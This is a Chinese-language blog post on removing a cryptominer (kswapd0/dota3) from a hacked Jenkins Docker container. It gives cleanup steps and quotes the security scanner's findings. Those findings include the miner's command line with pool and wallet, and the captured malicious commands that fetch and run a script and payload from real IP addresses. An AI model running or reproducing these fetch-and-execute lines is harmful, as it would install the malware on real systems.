最近,服务器的docker容器被挖矿程序黑了,手动处理如下:
step1.删除相关病毒文件(删除后请再次查询确认是否删除成功)
执行查找命令 find / -name kswapd0
显示查找结果:
/proc/3316/.X2c4-unix/.rsync/a/kswapd0
/root/.configrc5/a/kswapd0
/tmp/.X2c4-unix/.rsync/a/kswapd0
用 rm -rf 命令逐条删除上面3个路径文件。
step2.关闭对应进程:top 命令:
找到 进程名称内包含 kswapd0 的进程,kill -9 ID 干掉;
step3..删除病毒脚本定时执行对应的定时任务配置:
3.1查看linux 的定时任务进程,查看服务器的任务计划,可使用命令: crontab -e
回显:
5 6 * * 0 /root/.configrc5/a/upd>/dev/null 2>&1
@reboot /root/.configrc5/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.configrc5/b/sync>/dev/null 2>&1
@reboot /root/.configrc5/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X2c4-unix/.rsync/c/aptitude>/dev/null 2>&1
这些都是和病毒后台下载运行有关的、直接VI编辑器进入清空强制保存;
PS:
1.注意这些文件路径,就是步骤1对应删除的文件,实际可以先执行step3,再执行step1,2
注意,这里需要多尝试保存几次,确认已清空;
2.chattr -i file.txt 这个命令可以修改文件权限,取消不可修改限制;遇到文件不能删除,请尝试查询和使用该命令;
step4.其他补充(可以不执行,仅作参考):
4.1如果安装的docker某个容器被黑了,建议直接删除被黑的 docker 容器;
命令:docker rm 容器ID;
4.2服务器安装git ,jenkens等等类似需要设置公钥密钥的工具,请在服务器内删除对应的公钥;
举例:我安装的了jenkins容器被黑,先删除对应 docker容器ID,再删除对应服务器配置的公钥,操作如下(删除这个是因为怕黑客复制了服务器所有文件,并尝试用上传同步工具上传代码):
4.2.1查询公钥:cat ~/.ssh/authorized_keys
4.2.2删除对应公钥(这里我把所有公钥都删了,实际请按需删除):rm ~/.ssh/authorized_keys
4.2.3重新安装删除的容器,使用最新的配置;
4.3请确认是否存在其他挖矿病毒,比如kdevtmpfsi等,处理都类似;可参照上面执行,个人建议起始第一步都是先关闭病毒对应进程作为第一步;
step5.最后重点:一定要修改密码~~~~。
执行完上面操作,阿里云上的服务器CPU使用率从50%,直接降低到5%以内,亲测有效;次日观察,确实恢复了
----------------------------------------------------
以下是挖矿程序病毒运行特征:
文件路径/root/.configrc5/a/kswapd0
恶意文件md58da798989b6e48fb211674b652119a8c
文件路径/proc/11389/root/var/jenkins_home/workspace/UpdateJenkins/trace
恶意文件md5a86abadfe98019aceccd8980666868de
扫描来源方式进程启动扫描
检测方式云查杀
进程id11977
进程命令行./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url auto.c3pool.org:13333 --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW --pass elf2 --keepalive
文件创建用户N/A
文件修改时间2020-10-19 04:25:59
容器名jenkins001 ---这个是我被黑的容器名称
容器ID25f083279e04cf6e923f6c453b80ef22ab4db9a6313c711754666432f2a1177f
镜像IDjenkins/jenkins@sha256:ea042d8f75dadddf3386456922a0868823164ab076e78ceef78e1593e8466247
镜像名jenkins/jenkins:latest
容器视角文件路径/var/jenkins_home/workspace/UpdateJenkins/trace
以下是自动执行的恶意脚本:
进程文件名bash
父进程IDXXXXX
父进程路径perl
父进程文件路径/usr/bin/perl
sh -c wget -q http://161.35.236.24/tddwrt7s.sh || curl -s -O -f http://161.35.236.24/tddwrt7s.sh 2>&1 3>&1
sh -c ./tddwrt7s.sh "http://167.172.213.233/dota3.tar.gz" "http://5.189.187.165/dota3.tar.gz" "http://216.70.68.24/dota3.tar.gz" "http://104.131.132.54/dota3.tar.gz" "http://89.108.94.182/dota3.tar.gz" "http://46.101.231.231/dota3.tar.gz" "http://46.101.83.106/dota3.tar.gz" >.out 2>&1 3>&1
服务器存在香港异地登录。。。。。虽然只是学习用的便宜机器。
再次强调,一定要修改密码,强度要高,设置了类似Pass1234这类简单密码,直接GG。。